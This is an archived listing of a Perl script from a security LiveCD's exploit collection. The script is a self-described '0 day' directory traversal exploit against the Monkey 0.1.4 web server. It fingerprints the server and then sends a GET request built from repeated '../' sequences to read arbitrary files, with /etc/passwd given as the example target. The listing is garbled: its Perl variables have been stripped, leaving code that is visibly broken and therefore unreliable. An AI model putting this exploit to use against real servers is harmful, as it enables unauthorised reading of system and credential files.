home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / monkey / monkey014.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  1.8 KB  |  66 lines
  1. #!/usr/bin/perl
  2. #
  3. # (0 day;) Monkey-0.1.4 reverse traversal exploit
  4. #
  5. # Usage:
  6. #    perl monkey.pl <hostname> <httpport> <file>
  7. #
  8. #    <hostname> - target host
  9. #    <httpport> - port on which HTTP daemon is listening
  10. #    <file>     - file which you wanna get
  11. #
  12. # Example:
  13. #    perl monkey.pl www.ii-labs.org 80 /etc/passwd
  14. #
  15. #                             by DownBload <downbload@hotmail.com>
  16. #                             Illegal Instruction Labs
  17. #
  18. use IO::Socket;
  19.  
  20.  sub sock () {
  21.     = IO::Socket::INET->new (PeerAddr => ,
  22.                                   PeerPort => ,
  23.                                   Proto    => "tcp")
  24.    || die "[ ERROR: Can't connect to !!! ]\n\n";
  25.  }
  26.  
  27.  sub banner() {
  28.   print "[--------------------------------------------------]\n";
  29.   print "[       Monkey-0.1.4 reverse traversal exploit     ]\n";
  30.   print "[        by DownBload <downbload\@hotmail.com>      ]\n";
  31.   print "[             Illegal Instruction Labs             ]\n";
  32.   print "[--------------------------------------------------]\n";
  33.  }
  34.  
  35.  if (0ARGV != 2)
  36.  {
  37.   banner();
  38.   print "[ Usage:                                           ]\n";
  39.   print "[    perl monkey.pl <hostname> <httpport> <file>   ]\n";
  40.   print "[--------------------------------------------------]\n";
  41.   exit(0);
  42.  }
  43.  
  44.   = [0];
  45.   = [1];
  46.   = [2];
  47.  
  48.  banner();
  49.  print "[ Connecting to ... ]\n";
  50.  sock();
  51.  print "[ Sending probe... ]\n";
  52.  print  "HEAD / HTTP/1.0\n\n";
  53.  while ( = <>) {  =  . ; }
  54.  if ( =~ /Monkey/) { print "[ Monkey HTTP server found,
  55. continuing... ]\n"; }
  56.  else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
  57.  close ();
  58.  
  59.  print "[ Connecting to ... ]\n";
  60.  sock();
  61.  print "[ Sending GET request... ]\n";
  62.  print  "GET //../../../../../../../../../ HTTP/1.0\n\n";
  63.  print "[ Waiting for response... ]\n\n";
  64.  while ( = <>) { print ; }
  65.  close ();
  66.